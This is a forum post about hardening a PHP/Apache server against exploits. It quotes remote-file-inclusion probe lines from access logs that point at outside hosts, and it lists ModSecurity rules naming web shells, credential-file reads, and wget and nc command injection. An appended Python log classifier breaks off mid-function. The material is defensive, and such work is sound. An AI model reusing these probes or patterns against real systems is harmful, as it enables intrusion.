  1. #1

    Counter PHP Exploit Techniques

    Lately, our server logs are being filled with requests from exploited servers. In order to prevent our servers from being hacked, I have tried to harden the server as much as possible. (Server: Centos 4.6, Apache 2, PHP 5, MySql 5, Cpanel/WHM)

    I have detailed my efforts and would appreciate some feedback or suggestions of your own that have been effective.

    -------------

    Examples include c99.txt exploits, php insertions, etc.

    Recent Sample Logs:

    Code:
    66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
    Code:
    64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"
    Code:
    207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

    What to do to prevent these intrusions?

    1) I have updated my Mod_Security rules (running version modsec2) to include checks for the following:

    Code:
    # Check Content-Length and reject all non numeric ones
    SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"
    
    # Do not accept GET or HEAD requests with bodies
    SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
    SecRule REQUEST_HEADERS:Content-Length "!^0?$"
    
    # Require Content-Length to be provided with every POST request.
    SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
    SecRule &REQUEST_HEADERS:Content-Length "@eq 0"
    
    # Don't accept transfer encodings we know we don't know how to handle
    SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"
    
    # Check decodings
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateUrlEncoding" \
    	"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"
    
    # Proxy access attempt
    SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"
    
    #
    # Restrict type of characters sent
    SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer \
    	"@validateByteRange 1-255" \
    	"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"
    
    SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255" \
    	"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"
    
    # allow request methods
    SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$" \
        "phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"
    
    
    # Restrict file extension
    # removed exe so that frontpage will work
    
    # Restricted HTTP headers 
    SecRule REQUEST_HEADERS_NAMES "\.(?:Lock-Token|Translate|If)$" \
        "deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"
    
    SecRule HTTP_User-Agent "(?:\b(?:m(?:ozilla\/4\.0 \(compatible\)|etis)|webtrends security analyzer|pmafind)\b|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|\.nasl)" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
    SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
    SecRule REQUEST_FILENAME "^/nessustest" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla\/(?:4\.0 \(compatible; advanced email extractor|2\.0 \(compatible; newt activex; win32\))|ailto:craftbot\@yahoo\.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)[email protected]|rsync|shai|zeus)" \
            "deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:\b(?:(?:indy librar|snoop)y|microsoft url control|lynx)\b|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)" \
            "chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
    SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"
    
    
    # Session fixation
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"
    
    # Blind SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtype\W+\bchar|rownum)\b|t(?:able_name\b|extpos\W+\())" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"        
    
    # SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|group\b.*\bby\b.{1,100}?\bhaving|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|(?:having|or|and)\b\s+?(?:\d{1,10}|'[^=]{1,10}')\s*?[=<>]+|(?:print\]\b\W*?\@|root)\@|c(?:ast\b\W*?\(|oalesce\b))|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)')" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)\b" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"
    
    # XSS
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"
    
    # file injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"
    
    # Command access
    SecRule REQUEST_FILENAME "\b(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp)\.exe\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"
    
    # Command injection
    SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:32)?\.exe\b|\b\W*?\/c)|d(?:\b\W*?[\\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b))|\/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:\+\+|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:[\'\"\|\;\`\-\s]|$))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
    SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent" \
    		"\bwget\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"
    
    # SSI injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"
    
    # PHP injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|\$_(?:(?:pos|ge)t|session))\b|<\?(?!xml))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"
    
    #suntzu
    SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
    
    #Known rootkits
    SecRule REQUEST_URI|REQUEST_BODY "perl (xpl\.pl|kut|viewde|httpd\.txt)"
    SecRule REQUEST_URI|REQUEST_BODY "\./xkernel\;"
    SecRule REQUEST_URI|REQUEST_BODY "/kaiten\.c"
    SecRule REQUEST_URI|REQUEST_BODY "/mampus\?&(cmd|command)"
    
    # WEB-MISC .htpasswd access
    SecRule REQUEST_URI  "\.htpasswd" 
    
    # WEB-MISC /etc/passwd access
    SecRule REQUEST_URI  "/etc/passwd"
    
    #Exploit agent
    SecRule HTTP_User-Agent "Mosiac 1\.*"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    # WEB-CGI formmail
    SecRule REQUEST_URI "/(formmail|mailform)(\x0a|\.pl\x0a)"
    
    #Invision Board ipchat.php file include
    SecRule REQUEST_URI "/hk/ipchat\.php*root_path*conf_global\.php"
    
    #Invision Power Board SQL injection
    SecRule REQUEST_URI "/hk/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"
    
    #Invision Gallery SQL Injection Vulnerabilities
    SecRule REQUEST_URI "/hk/index\.php" chain
    SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
    
    
    # TIKIWIKI
    SecRule REQUEST_URI  "/tiki-map.phtml\?mapfile=\.\./\.\./"
    
    #Wordpress shell injection Vulnerability
    SecRule  REQUEST_URI "/cache/user.*/.*\.php\?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"
    
    #Bad agent
    SecRule HTTP_User-Agent "Brutus/AET"
    
    #Web leaches
    SecRule HTTP_User-Agent "Linux"
    SecRule HTTP_User-Agent "libcurl-agent"
    SecRule HTTP_User-Agent "TurnitinBot"
    SecRule HTTP_User-Agent "ANONYMOUS"
    SecRule HTTP_User-Agent "LinkWalker"
    SecRule HTTP_User-Agent "Drecombot"
    SecRule HTTP_User-Agent "Mac Finder"
    SecRule HTTP_User-Agent "ConveraCrawler"
    SecRule HTTP_User-Agent "WebarooBot"
    SecRule HTTP_User-Agent "RufusBot"
    SecRule HTTP_User-Agent "SumeetBot"
    SecRule HTTP_User-Agent "pulseBot"
    SecRule HTTP_User-Agent "FyberSpider"
    SecRule HTTP_User-Agent "1-More Scanner v1.25"
    SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
    SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
    SecRule HTTP_User-Agent "SnapPreviewBot"
    SecRule HTTP_User-Agent "IRLbot"
    SecRule HTTP_User-Agent "Charlotte"
    SecRule HTTP_User-Agent "ninetowns"
    SecRule HTTP_User-Agent "heritrix"
    SecRule HTTP_User-Agent "Python-urllib"
    SecRule HTTP_User-Agent "InetURL"
    SecRule HTTP_User-Agent "cazoodle"
    SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
    SecRule HTTP_User-Agent "Browsezilla"
    SecRule HTTP_User-Agent "MetagerBot"
    SecRule HTTP_User-Agent "TALWinHttpClient"
    SecRule HTTP_User-Agent "Snapbot"
    SecRule HTTP_User-Agent "BDFetch"
    SecRule HTTP_User-Agent "WebaltBot"
    SecRule HTTP_User-Agent "VSynCrawler"
    SecRule HTTP_User-Agent "UbiCrawler"
    SecRule HTTP_User-Agent "WebCapture"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "FairAd Client"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Crescent"
    SecRule HTTP_User-Agent "MIIxpc"
    SecRule HTTP_User-Agent "Harvest"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "Snoopy"
    SecRule HTTP_User-Agent "IDBot"
    SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "PEAR HTTP_Request class"
    SecRule HTTP_User-Agent "libwww-perl"
    SecRule HTTP_User-Agent "Exabot"
    SecRule HTTP_User-Agent "NeuralBot/0\.2"
    SecRule HTTP_User-Agent "Kenjin Spider"
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "grub-client"
    SecRule HTTP_User-Agent "Web Downloader"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebPix"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "Webster"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebRipper"
    SecRule HTTP_User-Agent "WebStripper"
    SecRule HTTP_User-Agent "WebReaper"
    SecRule HTTP_User-Agent "HTTrack"
    SecRule HTTP_User-Agent "furl"
    SecRule HTTP_User-Agent "blackspider"
    SecRule HTTP_User-Agent "teleport pro"
    SecRule HTTP_User-Agent "combine"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "larbin"
    SecRule HTTP_User-Agent "jakarta"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "SiteSnagger"
    SecRule HTTP_User-Agent "Schmozilla"
    SecRule HTTP_User-Agent "ProWebWalker"
    SecRule HTTP_User-Agent "LiteFinder"
    SecRule HTTP_User-Agent "CheeseBot"
    SecRule HTTP_User-Agent "Morfeus"
    SecRule HTTP_User-Agent "Teleport"
    SecRule HTTP_User-Agent "TMCrawler"
    SecRule HTTP_User-Agent "NetZIP"
    SecRule HTTP_User-Agent "Twiceler"
    SecRule HTTP_User-Agent "Nutscrape"
    SecRule HTTP_User-Agent "RedCarpet"
    SecRule HTTP_User-Agent "Nutch"
    SecRule HTTP_User-Agent "EmeraldShield.com"
    SecRule HTTP_User-Agent "Indy Library"
    SecRule HTTP_User-Agent "iCCrawler"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "Nessus"
    SecRule HTTP_User-Agent "BecomeBot"
    SecRule HTTP_User-Agent "DiamondBot"
    SecRule HTTP_User-Agent "IWAgent"
    SecRule HTTP_User-Agent "BrightCrawler"
    SecRule HTTP_User-Agent "ia_archiver" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "WWW-Mechanize"
    
    #some broken attack program
    SecRule REQUEST_URI|REQUEST_BODY "PUT /.*_@@RNDSTR@@"
    SecRule REQUEST_URI|REQUEST_BODY "soeasywebsite\.com"
    
    #bandwidth consumers
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "CopyGuard" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Picscout" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Digimarc WebReader" "deny,nolog,status:404"
    
    #spam bots
    SecRule HTTP_User-Agent  "DTS Agent"
    SecRule HTTP_User-Agent  "POE-Component-Client"
    SecRule HTTP_User-Agent  "WISEbot"
    SecRule HTTP_User-Agent  "^Shockwave Flash"
    SecRule HTTP_User-Agent  "Missigua"
    SecRule HTTP_User-Agent  "Java"
    
    #Gigablast
    SecRule HTTP_User-Agent "Gigabot" "deny,nolog,status:410"
    
    #e-mail collectors and spammers
    SecRule HTTP_User-Agent "WebBandit"
    SecRule HTTP_User-Agent "WEP Search 0"
    SecRule HTTP_User-Agent "Wells Search II"
    SecRule HTTP_User-Agent "psycheclone"
    SecRule HTTP_User-Agent "WEBMOLE"
    SecRule HTTP_User-Agent "Telesoft*"
    SecRule HTTP_User-Agent "WebEMailExtractor"
    SecRule HTTP_User-Agent "CherryPicker*"
    SecRule HTTP_User-Agent "NICErsPRO"
    SecRule HTTP_User-Agent "Advanced Email Extractor*"
    SecRule HTTP_User-Agent "EmailSiphon"
    SecRule HTTP_User-Agent "Extractorpro"
    SecRule HTTP_User-Agent "webbandit"
    SecRule HTTP_User-Agent "EmailCollector"
    SecRule HTTP_User-Agent "lwp-trivial"
    SecRule HTTP_User-Agent "WebEMailExtrac*"
    SecRule HTTP_User-Agent "EmailWolf"
    SecRule HTTP_User-Agent  "autoemailspider"
    SecRule HTTP_User-Agent  "EasyDL"
    SecRule HTTP_User-Agent  "ecollector"
    SecRule HTTP_User-Agent  "grub crawler"
    SecRule HTTP_User-Agent  "PycURL"
    SecRule HTTP_User-Agent  "DynaWeb"
    SecRule HTTP_User-Agent  "User-Agent"
    
    #bad referrers
    #SecRule HTTP_Referer|ARGS "customers\.brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "Webclipping\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "cwrank\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "exevior\.com"
    SecRule HTTP_Referer|ARGS "netshaq\.com"
    SecRule HTTP_Referer|ARGS "xomreviews\.com"
    SecRule HTTP_Referer|ARGS "ufoseek\.com"
    SecRule HTTP_Referer|ARGS "everyfeed\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "mysubject\.com"
    SecRule HTTP_Referer|ARGS "internetserviceteam\.com"
    SecRule HTTP_Referer|ARGS "site\.com"
    
    # Email Injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "[\n\r]\s*(?:to|bcc|cc)\s*:.*?\@" \
            "t:none,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Email Injection Attack. Matched signature <%{TX.0}>',id:'950019',severity:'2'"
    
    #new kit
    SecRule REQUEST_URI   "/c99shell\.txt"
    SecRule REQUEST_URI   "/c99\.txt\?"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    #c99 rootshell
    SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
    
    SecRule REQUEST_URI "/r57en\.php"
    
    #generic shell
    SecRule REQUEST_URI "shell\.txt"
    
    #Known rootkit Defacing Tool 2.0
    SecRule REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    
    #Generic remote perl execution with .pl extension
    SecRule REQUEST_URI "\;(\s|\t)*perl .*\.pl"
    
    #New SEL attack seen
    SecRule REQUEST_URI|REQUEST_BODY "select.*from.*information_schema\.tables"
    
    #New SQL attack seen
    SecRule REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"

    2) I have contacted the ISPs at their abuse@ email addresses. I don't know how seriously some of these companies take these notices, but it may help the webmaster to know his server is exploited.

    3) I secured my /tmp in /etc/fstab

    a) Ran the command secure/tmp
    b) added the following to /etc/fstab

    Code:
    none    /dev/shm    tmpfs    noexec,nosuid    0 0

    4) Using the CSF firewall and Mailscanner.

    5) Locked down the PHP variables.

    Check php for enable_dl
    Check php for disable_functions
    Check php for register_globals
    Check php open_basedir protection

    6) Keep Apache, MySql, PHP up to date.

    7) Changed SSH from password to an SSH key with a strong passphrase. Changed the SSH port from 22 to another port.

    8) Installed nobody_check to automatically kill malicious processes

    9) Installed Rkhunter and Chkrootkit

    10) Disable unneeded server services.

    Check server startup for cups
    Check server startup for xfs
    Check server startup for atd
    Check server startup for nfslock
    Check server startup for canna
    Check server startup for FreeWnn
    Check server startup for cups-config-daemon
    Check server startup for iiim
    Check server startup for mDNSResponder
    Check server startup for nifd
    Check server startup for rpcidmapd
    Check server startup for bluetooth
    Check server startup for anacron
    Check server startup for gpm
    Check server startup for saslauthd
    Check server startup for avahi-daemon
    Check server startup for avahi-dnsconfd
    Check server startup for hidd
    Check server startup for pcscd
    Check server startup for sbadm
    Check server startup for webmin

    11) Review my logs daily to look for problem child scrapers, hackers, and issues.
    Last edited by Frontpage1; 02-01-2008 at 03:51 PM.
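    The three log lines at the top of this post share one shape: a query parameter whose value is an absolute URL, which is what a remote file inclusion probe against include($_GET['x'])-style PHP looks like, and in the third case the script answered with a 200. As an added example, not code from the original post or from any tool the poster runs, the Python below parses Apache combined-format lines, URL-decodes the parameters, flags that pattern together with scripted user agents such as libwww-perl (which the rule set above also blocks), and totals hits per source address for the abuse@ notices mentioned in item 2. The sample lines are the post's three entries plus one constructed benign request; the function names and the two pattern lists are my own choices.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format, as used by the samples in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself an absolute URL: the shape of a remote
# file inclusion probe against include($_GET['x'])-style PHP.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Client libraries that rarely appear in a browser session; the post's
# own ModSecurity rules block these user agents as well.
TOOL_UA_RE = re.compile(r'libwww-perl|python-urllib|curl|wget', re.IGNORECASE)

# Constructed sample: the three lines from the post plus one benign request.
SAMPLE_LOG = [
    '66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"',
    '64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"',
    '207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"',
    '10.0.0.5 - - [01/Feb/2008:02:00:00 -0500] "GET /index.php?act=login&id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"',
]


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qsl percent-decodes values, so %3A%2F%2F becomes "://" before matching;
    # keep_blank_values keeps "id=http://host/x.txt?"-style pairs intact.
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like an exploit attempt (empty if none)."""
    reasons = []
    for name, value in rec['params']:
        if REMOTE_URL_RE.match(value):
            reasons.append(f'remote URL in parameter {name!r}')
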